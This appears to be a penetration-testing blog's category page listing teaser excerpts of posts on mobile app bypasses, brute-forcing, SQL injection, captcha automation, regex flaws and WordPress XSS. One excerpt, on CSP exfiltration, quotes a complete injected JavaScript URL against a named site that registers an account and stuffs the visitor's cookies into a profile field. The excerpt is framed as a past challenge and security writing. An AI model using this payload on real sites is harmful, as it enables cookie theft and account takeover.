Category: Penetration Testing
-
Guided Access Mode Bypass
As a penetration tester who specialises in mobile apps, I get good visibility of how the enterprise is adopting/using/misusing various iOS capabilities and MDM features. One trend I’ve seen increasingly is the use of ‘Guided Access Mode’ to lock down devices. Guided Access Mode (GAM), for the unfamiliar, locks the device into a single app. It’s…
-
High Performance Web Brute-Forcing 🕸🐏
Finding and exploiting unique attacks on web applications is, of course, satisfying. But I also find that performing the most basic of attacks, as efficiently and effectively as possible, can pose a decent mental challenge that’s equally rewarding. In this short post I’ll show you how writing just a few lines of code can…
-
Kinda LIKE SQL Injection
TLDR: This post is about some late-’90s-level hacking. But the fact is that there just doesn’t exist a decent explanation of this vulnerability anywhere on the internet… and yesterday, in 2018, I found another application vulnerable to it (to quite serious effect). I’m afraid that was the straw that broke the camel’s back.…
-
Much Badoo About Nothing
This is just a short post about toying with the Badoo app for iOS, but it also touches on something ever-so-slightly useful about testing the app-upgrade mechanisms of mobile apps. “Urghh, more dating app hacking” I hear you say. I know, I know, this is getting old. At some point I’ll get a real hobby, I promise.
-
‘App Forgery’
In this (pretty long) post, I’m going to attempt to coin a name for an application vulnerability, most commonly found in mobile apps. This is “App Forgery”.
-
PentestCTF – Another CTF Framework
Instead of doing my final-year project at University, I made (another) open-source CTF/Lab framework, primarily for my own learning benefit during its development, but also because I realised how powerful a group learning environment like a CTF is and I wanted to deploy one at my University. Keep reading to learn more…
-
Gotta Captcha’m All – Automating Image (and Audio!) Captchas.
A captcha serves one purpose: to ensure that a human has performed a task, and not a machine. In web applications, they attempt to prevent attackers from creating automated bits of code to brute-force forms, fuzz user input or cause a denial of service. It’s very much a non-trivial task these days to differentiate the man…
-
"Bypassing" CSP’s Data-Exfiltration Protections
A long time ago now, I tweeted a challenge to see if anyone knew what the following URL would attempt to do: http://www.insta-mapper.com/google_map.php?device_id=1234′;$.ajax({url:’/wp-login.php?action=register’,type:’POST’,data:”user_login=’dr’&user_email=’dr@evil.com’&gclient_id=&gredirect_uri=http://www.insta-mapper.com/&state_uri=http://www.insta-mapper.com&client_id=721352147882378&redirect_uri=http://www.insta-mapper.com&ws_plugin__s2member_registration=e4e7762e6a&ws_plugin__s2member_custom_reg_field_user_pass1=’123456’&ws_plugin__s2member_custom_reg_field_user_pass2=’123456’&ws_plugin__s2member_custom_reg_field_first_name=’d’&ws_plugin__s2member_custom_reg_field_last_name=’r’&ws_plugin__s2member_custom_reg_field_address_1=’1’&ws_plugin__s2member_custom_reg_field_address_2=&ws_plugin__s2member_custom_reg_field_city=s&ws_plugin__s2member_custom_reg_field_country=u&ws_plugin__s2member_custom_reg_field_mobile_devices='” encodeURI(document.cookie) “‘&ws_plugin__s2member_custom_reg_field_mobile_devices2=Apple&redirect_to=&wp-submit=Register”});var lol=’a
Don’t worry, I don’t expect you to stare at that monstrosity. Instead I’ll just tell you. So a friend of mine was competing in WhiteHatRally last year, which is a sort…
-
Hunting bad regex with good regex.
In this post I’ll look at how a simple regex flaw I found on a web application led me down a pretty big exploratory hole of trying to search for regex vulnerabilities in applications… using regex; the results of which have since been useful on many of my engagements.
-
WordPress – CSRF>XSS>Shell>Profit.
I did a small penetration test in 2013/14 for a client’s WordPress site, which has since been my go-to anecdote for explaining the potential of XSS… probably because, to non-sec folk, what it achieved sounds amazing, although it’s really rather easy to explain how and why it worked. This is that anecdote…